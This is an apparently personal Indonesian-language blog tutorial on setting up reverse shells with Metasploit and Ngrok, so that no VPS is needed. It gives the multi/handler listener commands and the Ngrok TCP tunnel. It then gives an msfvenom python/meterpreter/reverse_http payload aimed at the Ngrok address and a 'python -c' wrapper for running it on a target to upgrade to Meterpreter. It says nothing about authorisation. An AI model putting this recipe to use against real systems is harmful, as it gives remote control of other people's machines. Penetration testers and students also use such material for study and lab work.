Cara setup Reverse Shell dengan Metasploit dan Ngrok

security, sharing

Halo semuanya! Setelah sekian lama akhirnya ada ide buat nulis sesuatu lagi di blog ini 😄. Pada tulisan kali ini gw ga bahas tentang dunia perCTFan tapi masih dalam konteks dunia perhekingan, so cekidottt.

Materi yang gw akan bahas adalah cara melakukan Setup Reverse Shell menggunakan Metasploit dan Ngrok. Tapi sebelum mulai, gw kasih beberapa alasan kenapa gw milih Metasploit dan Ngrok untuk Reverse Shell.

  1. FREEEE
    Kita bisa melakukan Reverse Shell tanpa harus mempunyai atau menyewa server atau VPS. Reverse shell bisa dilakukan hanya bermodalkan device kita yang sudah terinstall Metasploit dan Ngrok.
  2. Metasploit dan Ngrok itu gampang installnya
    Yap, jika kalian menggunakan OS Kali Linux, pada device kalian pasti sudah otomatis terinstall metasploit sehingga tidak perlu untuk menginstallnya lagi.
    Untuk Ngrok kita bisa download single binarynya dan bisa langsung dijalankan, sehingga tidak perlu ribet-ribet install dependencies dan tetek bengeknya.
  3. Metasploit OP
    Metasploit mempunyai ribuan modul yang dapat digunakan, yang bisa membantu kita dalam melakukan exploitasi, pivoting, scanning dan macam-macam aktivitas lainnya.

Setup #

Sebelumnya pastikan Metasploit dan Ngrok sudah terinstall pada device anda. Untuk mengeceknya bisa menggunakan command msfconsole dan ngrok Metasploit

Tampilan Metasploit

Ngrok

Tampilan Ngrok

Setelah semuanya terinstall, kita bisa menjalankan listener dengan Metasploit menggunakan command berikut

use exploit/multi/handler
set LHOST 127.0.0.1
run -j

Exploit Multi Handler

Selanjutnya jalankan Ngrok dengan command seperti ini ngrok tcp 4444 maka tampilan layar anda akan berubah seperti ini Ngrok Running

Setelah semuanya selesai, kita bisa menyusun payload Reverse Shell. Untuk mempermudah, kita bisa menggunakan payload pada halaman ini revshells.com, masukkan IP dan Port sesuai dengan IP dan Port pada tampilan Ngrok tadi. Revshells.com Lalu pilihlah payload yang sesuai dengan kebutuhan dan keadaan anda.

Setelah menjalankan payload tersebut pada target, maka akan ada sessions baru pada Metasploit anda. Untuk mengeceknya kita bisa gunakan command sessions untuk melihat sessions yang aktif Sessions

Dan untuk melakukan interactive shell bisa menggunakan command sessions <id> Sessions 1

Nah, sampai disini seharusnya kita sudah berhasil melakukan Reverse Shell menggunakan Metasploit dan Ngrok. Tapi sepertinya ada yang kurang… apa ya?

Upgrade to Meterpreter #

Untuk mengupgrade dari shell ke Meterpreter kita tidak bisa melakukan sessions -u <id>, karena modul tersebut membuka port 4433 yang kita tidak forward pada Ngrok. Ini menyulitkan attacker untuk melakukan upgrade dari shell ke Meterpreter. Tetapi tentu saja ini masih bisa dilakukan, berikut langkah-langkahnya.

Background sessions jika masih aktif dalam sessions dengan menekan Ctrl + Z pada keyboard. Lalu set payload sesuai dengan yang diinginkan.
Saya akan mencontohkan menggunakan payload python/meterpreter/reverse_http, dan jalankan listener pada background menggunakan command berikut

set PAYLOAD python/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 4444
run -j

Exploit Multi Handler 2

Setelah itu, kita membuat sebuah payload Reverse Shell menggunakan msfvenom dengan payload python/meterpreter/reverse_http. Berikut commandnya (sesuaikan LHOST dan LPORT dengan Ngrok kalian)

msfvenom -p python/meterpreter/reverse_http LHOST=<ip ngrok> LPORT=<port ngrok> -f raw > http.py

Msfvenom http.py

Kembali lagi ke shell dan gabungkan payload yang sudah di generate msfvenom dengan payload berikut sehingga menjadi seperti berikut.

python -c "<payload msfvenom>"

Dan jalankan pada Shell Reverse Shell Upgrade

Tidak lama kita akan mendapatkan sessions baru yaitu sessions meterpreter. yeayy!! Meterpreter

Konklusi #

Reverse shell menggunakan Meterpreter dan Ngrok bisa menjadi salah satu alternatif terbaik jika anda tidak mempunyai server atau VPS sebagai listener. Terbukti dengan cara inipun kita bisa mengupgrade sessions kita sampai ke meterpreter sessions. Di tulisan gw selanjutnya, gw bakal share tentang persistence pada linux machine menggunakan Ngrok dan Metasploit tetapi dengan IP yang static 😱. So stay tune terus di blog gw yang random ini

Thank you!!